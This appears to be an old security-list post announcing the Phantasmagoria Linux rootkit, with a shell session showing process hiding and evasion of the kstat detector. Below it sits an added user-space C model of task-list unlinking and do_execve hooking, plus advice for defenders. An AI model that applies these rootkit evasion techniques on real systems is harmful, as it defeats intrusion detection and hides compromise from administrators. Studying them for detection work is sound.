It is possible to hide processes from kstat by removing their structs from the kernel's task_struct list. It is also possible to bypass kstat's checks on syscalls: if you modify a sub-function instead of the syscall itself (for example do_execve instead of sys_execve), the effect is the same, but for kstat everything is okay:

Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
686 403 0 0 kstat
Shoikan:~/Phantasmagoria# ./kstat -S
Probing System Calls FingerPrints...
No System Call Modified!
Shoikan:~/Phantasmagoria# insmod Phantasmagoria.o
Shoikan:~/Phantasmagoria# ./Heider 403 HIDE        (403 is the current shell's pid)
Hiding successfull
Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
Shoikan:~/Phantasmagoria# ./kstat -S
Probing System Calls FingerPrints...
No System Call Modified!
Shoikan:~/Phantasmagoria#

Attached there is an English translation plus proof-of-concept code of the original paper published on www.s0ftpj.org

Regards
-= Dark-Angel =-
Attachment:
Phantasmagoria.tgz
Description: GNU Zip compressed data
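The following is an added example written for this page; it is not code from the post or from the Phantasmagoria.tgz attachment. It is a user-space C model of the two evasions the post describes, so the detection gap can be reproduced without a 2.x kernel: a circular task list that a kstat-style walker (kstat_find_pid) traverses, a task_hide that unlinks one entry, and a syscall table whose sys_execve calls do_execve through a pointer, with a kstat -S style fingerprint (entry address plus the first bytes of the handler) that catches a hook on the table entry but not a hook on the helper. Every structure, the pid 403, the function names (task_insert, task_hide, kstat_fingerprint_take, kstat_syscalls_modified, run_scenario) and the fingerprint format are constructed simplifications, and the indirect do_execve pointer stands in for the rootkit patching the call site or the function body in a real kernel.

```c
/*
 * User-space model of the two kstat evasions described in the post: unlinking
 * a process from the task list and hooking the inner helper (do_execve) instead
 * of the syscall entry (sys_execve). Added example, NOT the Phantasmagoria
 * module; every structure and check here is a constructed simplification.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Circular doubly-linked task list headed by init_task (stands in for the
 * next_task/prev_task links of Linux 2.2/2.4). */
struct task {
    int pid;
    const char *comm;
    struct task *next_task, *prev_task;
};
static struct task init_task = { 0, "swapper", &init_task, &init_task };

static void task_insert(struct task *t)
{
    t->next_task = init_task.next_task;
    t->prev_task = &init_task;
    init_task.next_task->prev_task = t;
    init_task.next_task = t;
}

/* Hide: unlink from the list but leave the struct intact. In the real kernel
 * the run queue and pid hash are separate lists, so the process keeps running. */
static void task_hide(struct task *t)
{
    t->prev_task->next_task = t->next_task;
    t->next_task->prev_task = t->prev_task;
    t->next_task = t->prev_task = t;
}

/* kstat -P analogue: walk the task list; an unlinked pid is never reached. */
static int kstat_find_pid(int pid)
{
    const struct task *p;
    for (p = init_task.next_task; p != &init_task; p = p->next_task)
        if (p->pid == pid)
            return 1;
    return 0;
}

/* Syscall plumbing: the table holds sys_execve, which calls do_execve through
 * a pointer (simplification: a real rootkit patches the call or the function). */
typedef int (*fn_t)(const char *);
static int do_execve_orig(const char *path) { (void)path; return 0; }
static fn_t do_execve = do_execve_orig;
static int sys_execve(const char *path) { return do_execve(path); }
#define __NR_execve 11
static fn_t sys_call_table[32];

/* kstat -S analogue: fingerprint = table entry address plus the first bytes of
 * the handler's code, snapshotted while the system is believed clean. */
struct fp { fn_t addr; unsigned char head[8]; };
static struct fp baseline;
static void kstat_fingerprint_take(void)
{
    baseline.addr = sys_call_table[__NR_execve];
    memcpy(baseline.head, (const void *)(uintptr_t)baseline.addr, sizeof baseline.head);
}
static int kstat_syscalls_modified(void)
{
    fn_t cur = sys_call_table[__NR_execve];
    unsigned char head[8];
    if (cur != baseline.addr)
        return 1;
    memcpy(head, (const void *)(uintptr_t)cur, sizeof head);
    return memcmp(head, baseline.head, sizeof head) != 0;
}

/* Two rootkit strategies: hooking the table entry (caught by the fingerprint)
 * versus hooking the helper behind it (not caught). */
static int hook_hits;
static int evil_do_execve(const char *p) { hook_hits++; return do_execve_orig(p); }
static int evil_sys_execve(const char *p) { hook_hits++; return do_execve_orig(p); }

struct result { int visible_before, visible_after, flagged_table_hook,
                flagged_helper_hook, hook_fired; };

/* Replays the session from the post: pid 403 (the shell) visible and syscalls
 * clean, then hidden with the helper hooked while kstat -S still says clean. */
static struct result run_scenario(void)
{
    static struct task shell = { 403, "bash", NULL, NULL };
    struct result r;
    hook_hits = 0;
    do_execve = do_execve_orig;
    sys_call_table[__NR_execve] = sys_execve;
    kstat_fingerprint_take();                        /* "clean" baseline */
    task_insert(&shell);
    r.visible_before = kstat_find_pid(403);
    sys_call_table[__NR_execve] = evil_sys_execve;   /* naive hook: table entry */
    r.flagged_table_hook = kstat_syscalls_modified();
    sys_call_table[__NR_execve] = sys_execve;
    do_execve = evil_do_execve;                      /* post's hook: the helper */
    task_hide(&shell);                               /* ./Heider 403 HIDE */
    r.visible_after = kstat_find_pid(403);
    r.flagged_helper_hook = kstat_syscalls_modified();
    sys_call_table[__NR_execve]("/bin/ls");          /* hook still runs */
    r.hook_fired = hook_hits > 0;
    return r;
}

int main(void)
{
    struct result r = run_scenario();
    printf("pid 403 visible before/after hide: %d/%d\n", r.visible_before, r.visible_after);
    printf("kstat -S flags table hook: %d, helper hook: %d (hook ran: %d)\n",
           r.flagged_table_hook, r.flagged_helper_hook, r.hook_fired);
    return 0;
}
```

Build with `cc -o model model.c && ./model`. The model makes the defender's lesson explicit: a fingerprint of the syscall table entry and its prologue only covers the first function on the path, so a checker has to fingerprint (or compare against a known-good kernel image) every helper the syscall reaches, and a process listing built only from the task list has to be cross-checked against the other structures that still reference an unlinked task, such as the pid hash and the run queue in 2.x kernels.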